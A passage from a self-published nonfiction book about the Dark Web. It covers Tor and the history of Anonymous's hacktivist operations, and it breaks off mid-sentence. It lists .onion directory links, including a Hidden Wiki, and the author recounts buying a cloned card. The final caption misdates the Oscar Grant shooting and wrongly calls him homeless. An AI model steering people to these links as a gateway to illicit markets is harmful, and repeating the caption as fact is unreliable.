THE SECRET STORY

of the
DARK WEB
The Illegal Internet Exposed!

Derek Mailhiot
 Authored by Derek Mailhiot
NON-FICTION:
The Wise Wacky Wonderful Word of God
The Secret Story of 9/11
Trump: America’s First Zionist President
God’s Endgame for Planet Earth
God Is A Scientist! [not a religious fanatic]
The Secret Story of the Dark Web: The Illegal Internet Exposed!

FICTION:
12 Planets of the Intergalactic Map

Book 1: Travelers From Schyllus

Copyright © 2020 Derek Mailhiot
All rights reserved.
ISBN-13: 979-8-66535-716-4
Report online child pornography by forwarding the website address to the
National Center for Missing and Exploited Children (NCMEC) at
www.cybertipline.org or calling by 1-800-843-5678.
The author of The Secret Story of the Dark Web: The Illegal Internet
Exposed! has reported every child abuse site mention in this book.
 CONTENTS
Introduction
1 The Onion Router
2 We Are Anonymous. We Do Not Forget. We Do Not Forgive. Expect Us.
3 Anonymous: Operation Darknet
4 Eric Eoin Marques: "Kingpin of Child Porn"
5 Anonymous: Operation Alice Day
6 Judge, Jury, and Executioner
7 FBI: Operation Pacifier
8 Freedom Hosting II DDoSed
9 Welcome to Video
10 Omegle: Talk To Strangers Predators
11 ONIONLIST
12 AlphaBay Takedown
13 Hydra: Pokémon GO For Drugs
14 Hitman For Hire
15 Going Dark: Terrorism on the Dark Web
Final Word
 INTRODUCTION
Be warned. This book will look at some very disturbing activity and websites
on the Dark Web. I am deeply interested in internet technologies, which has
led me to start several internet companies and services dating back to 1994.
But I do not use any websites on the Dark Web. I show them to the reader in
order to expose alarming and dangerous activity on the Dark Web. Browsing
the Dark Web can lead you to illegal websites that can result in criminal
charges or other unfortunate outcomes.
On August 6, 1991, the general public connected to the World Wide Web for
the very first time. Its creator was Tim Berners-Lee who was a physicist at
CERN, the European Organization for Nuclear Research. In the 1980s, he
had been looking for a way for physicists to share information around the
world without all using the same types of hardware and software. This
culminated in his 1989 paper proposing, “A large hypertext database with
typed links.” He posted a short summary of the project on the alt.hypertext
newsgroup, giving birth to a new technology which would radically change
the way people worked and interacted with each other.
There was no fanfare in the global press on that first day. In fact, most people
around the world had never even heard about the internet. The launch was
simply marked by way of a short post from Berners-Lee on the alt.hypertext
newsgroup, where he explained how to download the browser and suggested
users visit his first public web page, at:
http://info.cern.ch/hypertext/WWW/TheProject.html

In 1993, it was announced by CERN that the World Wide Web was free for
everyone to use and develop, with no fees payable—a critical factor in the
transformational impact the web would soon have on the world.
It was also in 1993 when I first heard about the internet from a friend, who
told me that it was going to change everything. “Like what?” I asked. His
explanation wasn’t exactly clear to me but it didn’t matter, I was intrigued. I
headed off to Futureshop and bought my first computer with 4 MB of Ram
and a US Robotics “high-speed” 28.8K dial-up modem for $3,500 bucks. It
was happy times when I heard the magical music of the modem finally
connecting to the internet after hours of busy signals. I would fire up the
Lynx browser and navigating the links provided by Mindlink, the very first
ISP I used in Vancouver, BC. The Lynx browser was a popular text-based
browser, so you used your keyboard to navigate, not a mouse. I remember
one day logging on and finding Mindlink had replaced its directory of links
with something called “Yahoo!” I remember being annoyed because I
couldn’t find any of the sites I usually went to.
But when Netscape released its web browser was released on October 13,
1994, making the Lynx browser obsolete, I was off to the Vancouver Film
School to learn HTML 1.0, determined to create my own website.

In 1995, I founded InterWeb Connections, Incorporated. Impressive

sounding, if you didn’t know I actually worked from a table in my living
room. Initially, I designed websites for small businesses. Soon I migrated to
marketing, offering a service I called a “Search Engine Tune-Up,” striving to
rank my client’s websites at the top of the leading search engines of the day,
including AltaVista, Excite, Infoseek, Lycos, and WebCrawler.
Soon, I was creating my own websites. In 1996, I discovered “InfoDisk 5oo
w/Full Reprint Rights.” InfoDisk 500 contained hundreds of business reports,
including start-up guides to about 50 home-based businesses. Want to start a
Bed-and-Breakfast or run a daycare from home? InfoDisk 500 had the guide.
Thus, Be-Your-Own-Boss.com was born—and I sold thousands and
thousands of these reports worldwide. People could buy any 10 reports for
$19.95 + $3.00 s/h by mailing a check to my Mailboxes Etc box in
Vancouver. Every day I would drive down and pick up my checks. At its
peak, Be-Your-Own-Boss.com was making $2,000/week. Then Yahoo!
changed its directory hierarchy, and my high-level listing in the category
“Small Business Information” was moved 6 or 7 levels deep. Traffic to my
website—and sales—plummeted.
But the internet was young and brimming with opportunity. Next, came a
website called CareerXpress.com in 1998. It would go on to serve over
23,000 job seekers by 2005 with a service called Resume-Submit!

CareerXpress.com (1998-2005)
CareerXpress.com was a great business—until cheap (or free) software
programs flooded the market that did exactly what I was doing.
In 2002, I started a second internet company called Wirehead Labs with the
idea to develop more complex websites. I hired some programmers in India
to develop a job board called JobGuru.com. I was going to compete with
CarreBuilder.com and Monster.com. It was pretty successful, and I sold it in
2005 for enough money to retire on.
But as a serial entrepreneur with a deep interest in internet technologies,
onward I explored. Software-as-a-Service—which eventually evolved into
what is called cloud computing today—looked very promising back in 2005.
Thus, once again I hired some programmers in India to develop
SalesGuru.com.

SalesGuru.com (2005-2009)

SalesGuru.com was doing spectacular after launching in 2007, until the

“Great Recession” of 2008/09 sent it to the graveyard. Shortly before the
recession, we were in talks to sell Salesguru.com to a company called J2
Global, Inc. But as the Great Recession hit, they told us they had a 100
opportunities, and would only be looking at a half-dozen to buy. Apparently,
SalesGuru.com was not one of the half-dozen.
I launched JobXpress.org, where job seekers could search 6 million jobs
posted at a dozen other job boards in a single search, then easily save and
apply for the jobs that interested them. It was free to the user; revenue was
generated from ads on the site.
ZeroPercentRealty.com let people list their homes online for a modest fee of
$99, thus saving thousands in commissions. I was a Realtor for a while so I
designed the forms to gather all the information that home buyers were
always asking me, and displayed the info intuitively. As a Realtor, I used one
system that didn’t display basic information, like the age of the house. How
stupid is that! Homebuyers want to know that. Another system I used
displayed the information is a big mess so you couldn’t find anything. So I
made sure ZeroPercentRealty.com looked sharp.
 ZeroPercentRealty.com (2015-2017)

For every website I launched that was successful, there were at least 3 that
were complete flops. For example, when Elon Musk sold Zip2 to Compaq
computer in 1999 for $307 million, I launched a “me-too” website called
“SearchIt!” It flopped.
But I didn’t mind the failures because the internet was nothing less than a
fascinating journey that really was changing the world, just like my friend
said it would.
I watched Netscape take the web by storm in 1994 and get bought by AOL in
1998 for a staggering $4.2 billion, only to die a slow death when Bill Gates
made Internet Explorer part of the Windows operating system.
I saw Amazon start as a simple online bookstore in 1994 and grow into the
behemoth it is today, completely changing the way we shop.

Amazon.com in 1994

I saw venture capitalists throw $100 million at Pets.com during the dot-com
bubble, then take the company public in February 2000, only to see it shut
down in 9 months later. It turns out it isn’t good business to lose money on
every sale.
I saw Yahoo! purchase GeoCities for $3.5 billion in 1999. Unfortunately,
GeoCities was quickly supplanted by MySpace. From 2005 to 2008,
MySpace was the largest social networking site in the world, reaching more
than 100 million users per month. In June 2006, MySpace even surpassed
Yahoo and Google to become the most visited website in the United States.
For that short time, MySpace was brilliant, until Facebook took what worked
about MySpace, tweaked it, and found the winning formula. In April 2008,
Myspace was overtaken by Facebook in the number of unique worldwide
visitors, and in May 2009, Facebook surpassed MySpace in the number of
unique U.S. visitors. It's hard to imagine a life without Facebook nowadays.
Even organizing demonstrations and direct action has been revolutionized by
Facebook.
I saw Twitter change the way we consume news and change what makes
news. Importantly, Twitter has enabled activism to reach millions of people
in real-time, resulting in rapid social change. The 2011 Arab Spring was
dubbed the Twitter revolution for a reason.
I saw Youtube transform from a failed video dating site to the primary
destination of educational how-to videos. Fully 86% of YouTube users
surveyed say that the site is very or somewhat important to them when it
comes to figuring out how to do things they haven’t done before. YouTube
also acts as a platform for expression and a place for debate for millions and
millions of people, every single day.
But I also saw the rise of the Dark Web.
 1
THE ONION ROUTER
Bad things happen on the so-called “Dark Web”—the hidden parts of the
internet that is not accessible with web browsers like Google Chrome or
Microsoft Edge. The Tor browser is the key component to the Darknet.
Tor is short for "The Onion Router." Put simply, Tor enables you to route
web traffic through several other computers in the Tor network so that the
party on the other end of the connection can't trace the traffic back to you.
That way, the more Tor users there are, the more protected your info. As the
name implies, it creates a number of layers that conceal your identity from
the rest of the world.
For example, this is the link to the most popular Hidden Wiki, a directory of
links to other websites on the Dark Web that anyone can edit after they
register:
http://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad.onion

Other starting points include:

DuckDuckGo: https://3g2upl4pq6kufc4m.onion
not Evil: http://hss3uro2hsxfogfq.onion
Torch: http://xmh57jrzrnw6insl.onion
But type either of those urls into Chrome or Edge and you’ll get an error
because regular browsers don’t support .onion websites. All websites on the
Dark Web have a .onion internet address (not .com, .org, etc) and you need
the Tor browser to connect to a .onion website.
To download Tor, you go to the Tor Project website at:
https://www.torproject.org/
The Tor Project emphasizes the benefits of Tor primarily as a way to guard
against tracking and surveillance, and to circumvent censorship. Indeed,
journalists use Tor to communicate more safely with whistleblowers and
dissidents, and non-governmental organizations (NGOs) use Tor so that their
workers can connect to their home website while they're in a foreign country,
without notifying everybody nearby that they're working with that
organization.
The Tor Project highlights these uses:
Normal people can protect their privacy from unscrupulous
marketers and identity thieves. Internet Service Providers (ISPs)
sell your internet browsing records to marketers or anyone else
 willing to pay for it. ISPs typically say that they anonymize the
data by not providing personally identifiable information, but
this has proven incorrect. A full record of every site you visit,
the text of every search you perform, and potentially userid and
even password information can still be part of this data. In
addition to your ISP, the websites like Facebook and search
engines like Google you visit have their own logs, containing the
same or more information.

Human Rights Watch recommends Tor in their report, “Race to

the Bottom: Corporate Complicity in Chinese Internet
Censorship.” The study co-author interviewed Roger Dingledine,
Tor project leader, on Tor use. They cover Tor in the section on
how to breach the “Great Firewall of China,” and recommend
that human rights workers throughout the globe use Tor for
“secure browsing and communications.”

In the US, the Supreme Court recently stripped legal protections

from government whistleblowers. But whistleblowers working
for governmental transparency or corporate accountability can
use Tor to seek justice without personal repercussions.

But policing the Dark Web is very difficult, and so illegal activity runs
rampant. The anonymity of Tor allows anyone to easily buy cloned credit
cards, illicit drugs, and counterfeit goods. Hackers can share computer
viruses and pedophiles can share child pornography undetected. You can hire
a hacker to “ruin someone’s life” or a hitman to kill your spouse so that you
can collect the insurance money. Sites on the Dark Web offer the “rent”
and/or “sale” of girls, services of child escort agencies, slaves, and human
organs. Terrorist groups use the Dark Web to propagate their narratives while
remaining completely hidden from intelligence agencies, thus making it
increasingly difficult to detect and arrest terrorism perpetrators or inciters of
hate.
Certainly, many are scams. I tested a couple. I purchased a cloned credit card
with Bitcoin but never received the cloned card.
I also hired a hacker to hack into my personal Twitter account, which I never
used. Although the password was supposed to be emailed to me, I soon found
it had been taken over by someone in an Arab country. My Twitter account
had scores of posting in Arabic. I don’t read Arabic so I posted some of the
images on Reddit, thinking it might be radical extremists who now had
control of my Twitter account. It turns out the postings were fashion and
cosmetic ads for a mall somewhere in the Middle East. It took me a year to
get my Twitter account back.
So just how big is the Dark Web compared to the surface web—used by all
users—and the deep web.
The surface web, the part of the internet most familiar to everyday users,
contains information and websites that are accessed by using standard search
engines like Bing, Google, or Yahoo. Information obtained from these sites is
visible to those who want to see it, without restrictions.
Unlike the surface web, the deep web has certain user restrictions when it
comes to access. Internet sites such as Facebook, Twitter, or Snapchat, for
example, as well as file-sharing services such as Dropbox, Google Drive,
webmail, and online banking pages, are part of the deep web because they
require verified logins to clear a level of security before access is granted.
The deep web is approximately 500 times larger than the surface web.
The deep web accounts for an estimated 90% of the content hosted on the
internet, while the Dark Web accounts for approximately 0.01%. While there
is no exact figure on the number of sites hosted on the Dark Web, 30,000 to
50,000 would be a good guess. These Dark Web sites range from secret files
of journalists, conversations between human rights activists, illicit trading
sites, and images of child pornography to terrorist sites that proselytize
violent extremist viewpoints.
The Dark Web is also the perfect environment for scammers—impenetrable
to search engines and rife with illegality. Online forums crawled with
references to sentient AIs lurking in the Dark Web, live-streaming websites
showing people being slaughtered in “red rooms,” or dark web pages
revealing the secret of the Illuminati. This weird fringe of the internet, it's one
of the toughest areas to seek truth.
 Final Word
This book presents an interesting conundrum: while the Dark Web is used to
protect privacy advocates, whistleblowers, and human rights activists, it also
provides a dangerous platform for those engaging in illicit activities and
scams by granting them anonymity through encryption.
 2
WE ARE ANONYMOUS.
WE DO NOT FORGET. WE DO NOT FORGIVE.
EXPECT US.
I will confess upfront that I love Anonymous—the amorphous hacktivist
collective. Anonymous began on the troll hub 4chan as a moral-free prank
squad but has since evolved into a group of vigilante justice crusaders,
changing the world for the better because of a passion to act outside the
confines of normal society.

Cyber hacking collective Anonymous announced it is going after ISIS after the terrorist militants killed
over 130 individuals in Paris on November 13, 2015.
The birthplace of Anonymous is a website called 4chan founded in 2003, that
developed an “anything goes” random section known as the /b/ board. The /b/
board was a web forum where posts have no author names and there are no
archives and it's explicitly about anything at all.
Anonymous is a culture. It has no leader, no membership lists, no
committees. It’s an amorphous group of people that can include anyone who
wants to use the brand to put forth their cause. The act of saying you are
Anonymous, means you are Anonymous. Anyone with an idea can call on
others to discuss the idea further. Depending on what you have suggested,
other Anons are going to rally around you or not.
At some point in time, /b/ and Anonymous reached an inflection point, and
Anons started working together to collectively attack targets for any
perceived slight, and have been linked to numerous high-profile “raids” over
the years, including internet attacks on governments, major corporations,
financial institutions, and religious groups.
Their methods mostly involve distributed denial-of-service (DDOS) attacks
—overflowing websites with bogus traffic so that they crash—and doxxing
targets by revealing their private information.
But Anonymous was never particularly focused. Raids could be devastating
or funny, but either way they came and went quickly, the net's own little
tornado system. Anonymous was never anyone's personal army, and never
stayed on any one topic for very long—until 2008.
Project Chanology
It took Tom Cruise to change all that and give Anonymous a political
consciousness—specifically, Tom Cruise as a disturbingly manic
Scientologist in a video that was leaked in January 2008. The notably
litigious church of Scientology’s efforts to force hosting services to take the
video down so enraged Anons that they decided to destroy the church itself.
 Screenshot from the video “Project Chanology: The Rise of Anonymous”

To accomplish this op, Anons created Project Chanology, which marked the
birth of political consciousness for Anonymous and the development of its
methods of taking mass action. The Church of Scientology, Anons reasoned,
hurt people, took their money, and lied to them under the guise of being
caretakers and teachers. Project Chanology was also the perfect way for the
community of Scientology detractors to jump under the wing of the
Anonymous collective.
And they made a video—a truly historical video that roused Anonymous and
set it on a path to become a ubiquitous movement to combat censorship,
promote freedom of speech, counter government control, and take action
against a wide array of social injustices.
The original Anonymous video can be viewed here:
https://www.youtube.com/watch?v=JCbKv9yiLiQ
Hello, Scientology. We are Anonymous.
Over the years, we have been watching you. Your campaigns of
misinformation; suppression of dissent; your litigious nature, all of
these things have caught our eye. With the leakage of your latest
propaganda video into mainstream circulation, the extent of your
malign influence over those who trust you, who call you leader, has
been made clear to us. Anonymous has therefore decided that your
organization should be destroyed. For the good of your followers, for
the good of mankind--for the laughs--we shall expel you from the
Internet and systematically dismantle the Church of Scientology in
its present form. We acknowledge you as a serious opponent, and we
are prepared for a long, long campaign. You will not prevail forever
against the angry masses of the body politic. Your methods,
hypocrisy, and the artlessness of your organization have sounded its
death knell.
You cannot hide; we are everywhere.
We cannot die; we are forever. We're getting bigger every day--and
solely by the force of our ideas, malicious and hostile as they often
are. If you want another name for your opponent, then call us
Legion, for we are many.
Yet for all that we are not as monstrous as you are; still our methods
are a parallel to your own. Doubtless you will use the Anon's actions
as an example of the persecution you have so long warned your
followers would come; this is acceptable. In fact, it is encouraged.
We are your SPs.
Gradually as we merge our pulse with that of your "Church", the
suppression of your followers will become increasingly difficult to
maintain. Believers will wake, and see that salvation has no price.
They will know that the stress, the frustration that they feel is not
something that may be blamed upon Anonymous. No--they will see
that it stems from a source far closer to each. Yes, we are SPs. But
the sum of suppression we could ever muster is eclipsed by that of
the RTC.

Knowledge is free.
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
 Expect us.
Scientology had pursued its detractors with mean spirited ruthlessness,
delving into critic's personal lives, following them with investigators, and
ruining their reputations. Anonymous didn't care.
On February 10, 2008, Anons set up meeting times and places in cities
around the world, left the internet by the thousands and showed up in front of
Scientology centers and church locations around the world, many wearing
their new Guy Fawkes masks—V for Vendetta movie merchandise sold by
Warner Brothers—to obscure their identities. They played music, walked
around with clever signs, and partied with their own in front of aghast
Scientologists in more than 90 cities. For the first time, the internet had
shown up on the real street, en masse.
Anonymous soon evolved from making creepy phone calls, phoning in fake
pizza deliveries, signing people up for embarrassing junk mail lists, sending
threatening e-mails, faxing black pages of paper to waste toner, overloading
servers—classic online troll fare—to hacking governments and corporations
as a way to take on the systems that run the world—through means both legal
and illegal (mostly illegal).
Operation Payback
In September 2010, Anons had a new target. In early September, a company
in India called AiPlex claimed that it was contracted by the Motion Picture
Association of America (MPAA) to send out takedown requests to piracy
sites, and controversially DDoS those that didn't respond, such as the
infamous anti-copyright BitTorrent site “The Pirate Bay” that took pride in
rejecting takedown requests.
Flier is aimed at convincing students to not abide warnings of anti-pirate groups, urging readers to
download as a civil disobedience.

Anons collectively howled. They believed media giants weren't only writing
copyright laws that hampered online freedoms but they were even employing
blackhat techniques that Anons had gone to jail for, with no fear of
punishment. Outraged, Anons created Operation Payback in September 2010
in retaliation.
When the Anti-Counterfeiting Trade Agreement (ACTA) proposed a three-
strikes-you-are-off-the-net approach to copyright infringement, threatening to
restrict access to the internet, the hive mind came together, and Anons railed:
Our chief complaint is that such measures would restrict people's
access to the internet… To threaten to cut people off from the global
consciousness as you have is criminal and abhorrent.
From 4chan and IRC, Anons coordinated a new kind of attack; a direct
retaliation against a major political player, sending out the call to take down
the websites of AiPlex and the MPAA AIPLEX for their attacks against the
popular torrent and file sharing site, The Pirate Bay:
September 19, 2010
To whom it may concern
This is to inform you that we, Anonymous, are organizing an
Operation called “Payback is a bitch”.
Anonymous will be attacking the RIAA (Recording Industry
Association of America), the MPAA (Motion Pictures Association of
America), and their hired gun AIPLEX for attacks against the
popular torrent and file sharing site, the Piratebay.
We will prevent users to access said enemy sites and we will keep
them down for as long as we can.
But why, you ask?
Anonymous is tired of corporate interests controlling the internet
and silencing the people's rights to spread information, but more
importantly, the right to SHARE with one another.

The RIAA and the MPAA feign to aid the artists and their cause; yet
they do no such thing. In their eyes is not hope, only dollar signs.
Anonymous will not stand this any longer.
We wish you the best of luck.
 Sincerely,
Anonymous,
We are legion.
The response was staggering—thousands of people who had never
considered themselves Anonymous, joined in and became a new generation
of Anons. Though they didn't care about the Church of Scientology or
4chan's history of shenanigans, they shared one important quality with their
raiding 4chan predecessors. They saw acting as Anonymous as a path to
empowerment. They could finally do something more than sign an online
petition.
On September 21, 2010, the website of United Kingdom law firm ACS:Law
was subjected to a DDoS attack as part of Operation Payback. When the site
came back online a 350MB file, which was a backup of the site, was visible
to anyone for a short period of time. The backup, which included copies of
emails sent by the firm, was downloaded and made available on various peer-
to-peer networks and websites including The Pirate Bay. Some of the emails
contained unencrypted Excel spreadsheets, listing the names and addresses of
people that ACS:Law had accused of illegally sharing media. One contained
more than 5,300 Sky broadband customers whom they had accused of
illegally sharing pornography, while another contained the details of 8,000
Sky customers and 400 Plusnet customers accused of infringing the copyright
on music by sharing it on peer-to-peer networks.
On September 27, 2010, the DDoS attack on the Australian Federation
Against Copyright Theft (AFACT) unintentionally brought down 8,000 other
small websites hosted on the same server.
During the 2010 MIPCOM convention, Gene Simmons of KISS stated:
Make sure your brand is protected ... Make sure there are no
incursions. Be litigious. Sue everybody. Take their homes, their cars.
Don't let anybody cross that line.
—   Gene Simmons
In response to Simmons' comments, participants in Operation Payback
switched their attention to his two websites, SimmonsRecords.com and
GeneSimmons.com, taking them both offline for a total of 38 hours. At some
point during the course of this DDoS, GeneSimmons.com was hacked and
redirected to ThePirateBay.org. In response to the attack Simmons wrote:
Some of you may have heard a few popcorn farts re: our sites being
threatened by hackers.
Our legal team and the FBI have been on the case and we have
found a few, shall we say "adventurous" young people, who feel they
are above the law.
And, as stated in my MIPCOM speech, we will sue their pants off.
First, they will be punished.
Second, they might find their little butts in jail, right next to someone
who's been there for years and is looking for a new girl friend.
We will soon be printing their names and pictures.
We will find you.
You cannot hide.
Stay tuned.
This led to additional attacks and subsequently more downtime for his
websites. Later, Simmons's message was removed from his website.
On October 26, 2010, LimeWire was ordered to disable the “searching,
downloading, uploading, file trading and/or file distribution functionality”
after losing a court battle with the RIAA over claims of copyright
infringement. Not satisfied with the injunction, the RIAA announced its
intention to continue the Arista Records LLC v. Lime Group LLC trial to
recover damages caused by the program. In retaliation, members of Operation
Payback announced that they would attack RIAA's website on October 29.
On October 29, riaa.org indeed was taken offline via DDoS attack. After the
attack, riaa.com and riaa.org sites were inaccessible in Europe. Operation
Payback's main site was then attacked later that day, and Anons subsequently
moved their website from tieve.tk to anonops.net.
In December 2010, the U.S. government started a heavy-handed legal
crackdown on WikiLeaks in response to the release of hundreds of thousands
of diplomatic documents leaked to the site by Bradley Manning. Senator Joe
Lieberman called Amazon to pressure them, successfully, to stop hosting
WikiLeaks files. Corporations such as Amazon, PayPal, BankAmerica, Swiss
bank PostFinance, MasterCard and Visa either stopped working with or froze
their customers' donations to WikiLeaks due to political pressures., and
Assange's Swiss bank froze his account. Operation Payback sparked to life
again.
Despite no charges being filed against WikiLeaks or its public face, Julian
Assange, the U.S. government relentlessly tried to shut down the site.
Anonymous reacted to this heavy-handed actions. Anons fulminated against
Visa and MasterCard because they would let people make donations to Neo-
Nazis, but not WikiLeaks. In the minds of Anons it was clear that power was
conspiring behind the scenes. And the hive mind, with a newfound morality,
wasn't content anymore to just complain in the comment section. Following
the United States diplomatic cables leak in December 2010, the organizers of
Operation Payback commenced DDoS attacks on websites of banks who had
withdrawn banking facilities from WikiLeaks.
The Anonymous collective were encouraged to send faxes of random WikiLeaks cables, letters from
Anonymous, Guy Fawkes, and the WikiLeaks logo to the target fax numbers all day long.

Operation Payback launched DDoS attacks against PayPal, PostFinance, and

the Swedish Prosecution Authority. On December 8, 2010, a coordinated
DDoS attack by Operation Payback brought down both the MasterCard and
Visa websites. On December 9, 2010, prior to a sustained DDoS attack on the
PayPal website that caused a minor slowdown to its service, PayPal
announced on its blog that it would release the frozen funds in the account of
the Wau Holland Foundation that was raising funds for WikiLeaks but would
not reactivate the account. Amazon successfully thwarted DDoS attacks, and
Anonymous aborted their efforts. CNN noted that the massive Amazon
website “is almost impossible to crash.”

List of sites and domains known to have been targeted

Operation Payback was mainly spectacle. None of the attacks disrupted the
function of the targeted entities for long, but that was missed by much of the
media, who instead confused people into believing that they wouldn't be able
to use their Visa or MasterCards to buy gas or groceries, thanks to
Anonymous. But Anonymous capitalized on the media attention, and made
bold proclamations of victory—and became famous.
OpTunisia
Then, on December 17, 2010, a poor Tunisian produce vendor named
Mohamed Bouazizi who lived in the rural town of Sidi Bouzid set himself on
fire to protest a crushing corruption he couldn't live with anymore. It was a
desperate act. But nothing would be the same again; not the Middle East, the
internet, or even American society would emerge from Bouazizi's self-
immolation unchanged. That very un-anonymous act of protest would
fundamentally change Anonymous as well.
Mohamed Bouazizi, a Tunisian street vendor, was the breadwinner for his
widowed mother and six siblings, but he didn't have a permit to sell the
goods. In December 2010, when the local police demanded Bouazizi hand
over his wooden cart, he refused. Police officers then harassed him and shut
down his business. With no recourse, Bouazizi marched in front of a
government building and set himself on fire. His act of desperation resonated
immediately with the people in his hometown of Sidi Bouzid. Protests began
that day, captured by cellphone cameras and shared worldwide on Facebook,
Twitter, and Youtube. Within days, protests rocked the country. The people
demonstrated against government corruption, and especially against Tunisia’s
autocratic president, Zine al-Abidine Ben Ali. A month later, after 23 years in
power, he fled to Saudi Arabia.
The momentum in Tunisia set off uprisings across the Middle East that
became known as the Arab Spring. A wave of pro-democracy protests spread
across Arabic-speaking countries in North Africa and the Middle East.
Protests, which spread rapidly due to social media, would spark full-scale
civil wars in Syria, Libya, and Yemen. Within months, the Arab Spring
ended up toppling the governments of Tunisia, Egypt, Libya, and Yemen.
Libyan dictator Colonel Muammar Gaddafi would be captured by rebels,
tortured, and killed. Other governments barely stayed in pow-er. Police
would beat thousands of pro-democracy protesters in Morocco. In Bahrain,
peaceful pro-democracy protests demanding the release of political prisoners
and human rights reforms, were violently suppressed by the government of
King Hamad bin Isa Al Khalifa.
In Syria, the government's lethal response to a protest by schoolchildren in
early 2011 would spark mass protests, and ignite a war and massive refugee
crisis, plunging Syria into a brutal civil war. Protests erupted in March 2011
in the southern city of Deraa after the arrest and torture of some teenagers
who painted revolutionary slogans on a school wall. After security forces
opened fire on demonstrators, killing several, more took to the streets. The
unrest triggered nationwide protests demanding President Bashar al-Assad's
resignation. The government's use of force to crush the dissent merely
hardened the protesters' resolve. By July 2011, hundreds of thousands were
taking to the streets across the country. Violence escalated and the country
descended into civil war as rebel brigades were formed to battle government
forces for control of cities, towns, and the countryside. Fighting reached the
capital Damascus and the city of Aleppo in 2012. By June 2013, 90,000
people had been killed in the conflict. In an attack most certainly carried out
by Syria's government, hundreds of people were killed in August 2013 after
rockets filled with the nerve agent sarin were fired at several suburbs of
Damascus. By August 2015, 250,000 people had been killed in the conflict.
More than 11 million others have been forced from their homes as forces
loyal to President Bashar al-Assad and those opposed to his rule battle each
other, as well as jihadist militants from the so-called Islamic State, also
known as the Islamic State of Iraq and Syria [ISIS] or the Islamic State of
Iraq and the Levant [ISIL].
Out of chaos in Syria, ISIS took control of large swathes of Syria and Iraq,
where it proclaimed the creation of a “caliphate” in June 2014. Its many
foreign fighters were involved in a “war within a war” in Syria, battling
rebels and rival jihadists from the al-Qaeda-affiliated Nusra Front, as well as
government and Kurdish forces.
Shortly after Bouazizi stood on the street doused in paint thinner, and
screamed “How do you expect me to make a living?” and let a lit match drop,
a few people formed #optunisia on IRC and started talking about what to do.
Over the next couple of weeks the small group DDoSed and defaced Tunisian
government websites, and passed media and news reports about the Tunisian
uprising in and out of the country.
Anons also distributed a digital “care package” containing stuff to work
around privacy restrictions in Tunisia, including a Greasemonkey script to
avoid proxy interception by the Tunisian government on Facebook users.
(Greasemonkey scripts are powerful browser plug-ins). Within that care
package was a message to the people of Tunisia from Anonymous: “This is
*your* revolution. It will neither be Twittered nor televised or IRC’ed. You
*must* hit the streets or you *will* loose the fight. Always stay safe, once
you got arrested you cannot do anything for yourself or your people. Your
government *is* watching you.”
Graphic of “Operation Tunisia” containing detailed instructions on how to install the digital care
package and join the IRC network on #OpTunisia.

Some of those in the #optunisia channel were Tunisians, including slim404,

whose real name was Slim Amamou, an outspoken Tunisian blogger.
Amamou and others put themselves at risk by passing news and software
back and forth between Anons and the outside world and the people on the
ground. In fact, Amamou was arrested on Jan. 6, 2011.
Then, less than a month after Bouazizi’s immolation, 23 years of brutal
dictatorship ended when Ben Ali—the second President of Tunisia from 1987
until his fall in 2011—fled from Tunisia.
Anons celebrated.
Amamou was released from jail and went on to become the secretary of state
for sport and youth—perhaps Anonymous’ first minister—though he
resigned a few months later to protest the transitional government’s
censorship of the web.
Tunisia changed everything for Anonymous. OpTunisia was the first of what
became known as the “Freedom Ops,” Anonymous operations that mostly
started in Middle Eastern countries in support of the Arab Spring, but spread
much further.
OpEgypt
The next was OpEgypt, where the protests were much bigger, and the
situation even more complex.
Right from the beginning of the occupation of Tahrir Square and the January
25 “Day of Revolt,” Anonymous started to set up lifeline internet connections
and target government servers to DDoS just as they had in Tunisia. Three
days later, Mubarak turned off the internet. Anonymous was aghast. But
Mubarak fell on February 11, not having lasted much longer than Ben Ali.
Once again Anons found they liked the sense of being part of history. The
pranksters-turned-activists were quickly becoming known around the world
for fighting the good fight beside the people, and they liked it. The Freedom
Ops proliferated.
Graphic of “Operation Egypt” containing detailed instructions on how to install the digital care
package and join the IRC network on #OpEgypt.

Anonymous, of course, didn't break down Mubarak's door in Cairo or storm

Qaddafi's compound in Tripoli, but they did work their asses off to help the
protesters on the ground, especially those who'd been blocked from accessing
the internet by government firewalls. Anonymous was there from the
beginning of the region's revolution in January with Operation Tunisia and
Operation Egypt both of which targeted government websites DDoS attacks
and aimed to enable protesters to better use the internet for their cause. It's
also believed that because of this, the struggling regimes targeted hacktivists
in an attempt to prevent a revolution. They did not succeed. Similar
operations happened in solidarity with the dissidents in Libya, Bahrain, and
Syria.
And the Anonymous motto “We never forget” rings true. DDoS attacks
against government websites continue to this very day.

Screenshot of #OpEgypt

The HBGary Hack

In February, Anonymous decided to declare war on Aaron Barr, chief
executive of a little known cybersecurity firm HBGary Federal. Barr had
made the mindless mistake of publicly announcing that he'd infiltrated
Anonymous and knew about its inner workings. He claimed the group had
around 30 members, and 10 “core” members who made the decisions, and
that he’d linked their IRC handles to their real names using social network
analysis. Anonymous was furious. By claiming the leaderless collective had
leadership they all secretly obeyed, Barr was accusing Anonymous of heresy
—and Anons responded with the viciousness of the defiled.
 The defacement of the HBGary Federal website

With the help of an SQL injection—one of the grossest-sounding and most

effective weapons in the hacker arsenal—the collective managed to scoop up
71,000 internal emails and documents from HBGary that included details
about everything from Barr's private life to a rather disconcerting PowerPoint
presentation (reportedly paid for by Bank of America) about Wikileaks and
journalists like Glenn Greenwald who supported the whistleblower
organization. It implied that drastic measures may be required to remove
guys like Greenwald from the equation.
By March, Aaron Barr had resigned as HBGary Federal's chief executive as
the company faced a federal investigation into its “use of subversive tactics.”
In that, Anonymous learned it could hack into a site and dump data on the
internet, and all over the world people picked through the data—in this case,
the HBGary e-mails to uncover security world schemes and even plots
against WikiLeaks. HBGary had taught them that they could be hacktivists, a
certain kind of anti-establishment hero.
OpBART
OpBART arose out of unlikely ground for Anonymous: the messy, offline
world of race relations and police violence from the California Bay Area’s
light rail system’s police force. Anti-police brutality protests had become a
recurring feature in San Francisco and Oakland since the 2009 shooting of
Oscar Grant by the Bay Area Rapid Transit (BART) police.

The shooting of a homeless man (Oscar Grant) that took place on December 31, 2009. One cop holds
the victim to the ground with his knee on the back of his neck, while the other cop (Johannes Mehserle)
